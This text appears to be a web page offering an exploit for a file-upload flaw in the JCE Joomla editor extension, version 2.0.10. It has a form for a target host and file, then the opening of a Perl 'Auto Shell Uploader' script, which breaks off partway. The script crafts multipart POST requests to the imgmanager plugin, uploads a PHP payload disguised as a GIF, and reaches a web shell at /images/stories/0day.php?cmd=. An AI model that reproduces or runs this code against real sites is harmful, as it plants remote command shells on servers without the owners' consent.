JCE Joomla Extension Remote File Upload

hostname (ex:www.sitename.com): *

path (ex: /joomla/ or just / ): *

Please specify a file to upload: *

specify a port (default is 80):

Proxy (ip:port):

* fields are required
Perl Version: ######################################### www.bugreport.ir ######################################## # # AmnPardaz Security Research & Penetration Testing Group # # # Title: Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 - PHP Version # Vendor: http://www.joomlacontenteditor.net # Vulnerable Version: JCE 2.0.10 (prior versions also may be affected) # Exploitation: Remote with browser # Original Advisory: http://www.bugreport.ir/index_78.htm # Vendor supplied patch: http://www.joomlacontenteditor.net/news/item/jce-2011-released # CVSS2 Base Score: (AV:N/AC:L/Au:N/C:P/I:P/A:P) --> 7.5 # Coded By: Mostafa Azizi ################################################################################################### use IO::Socket; use LWP::Simple; system("cls"); if(!defined($ARGV[0])) { print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n"; print "\t|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) ||||\n\n"; print "\t+--> Usage: perl $0 <--+\n"; print "\t+--> Example: perl $0 localhost <--+\n\n"; exit; } print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n"; print "\t|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) ||||\n\n"; $TARGET = $ARGV[0]; $PORT = "80"; $SCRIPT = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"; $SHELL = "/images/stories/0day.php?cmd="; $HTTP = "http://"; $header1G = "GET $SCRIPT HTTP/1.1"; $header1H = "HEAD /images/stories/0day.php HTTP/1.1"; $header1P = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1"; $header1P2 = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1"; $header2 = "Host: $TARGET"; $header3 = "User-Agent: BOT/0.1 (BOT for JCE)"; $header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334"; $header5 = "Content-Length: 769"; $header6 = "-----------------------------41184676334"; $header7 = 'Content-Disposition: form-data; name="upload-dir"'; $header8 = '/'; $header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""'; $header10 = 'Content-Type: application/octet-stream'; $header11 = 'Content-Disposition: form-data; name="upload-overwrite"'; $header12 = "0"; $header13 = 'Content-Disposition: form-data; name="Filedata"; filename="0day.gif"'; $header14 = 'Content-Type: image/gif'; $header15 = 'GIF89aG'; $header16 = "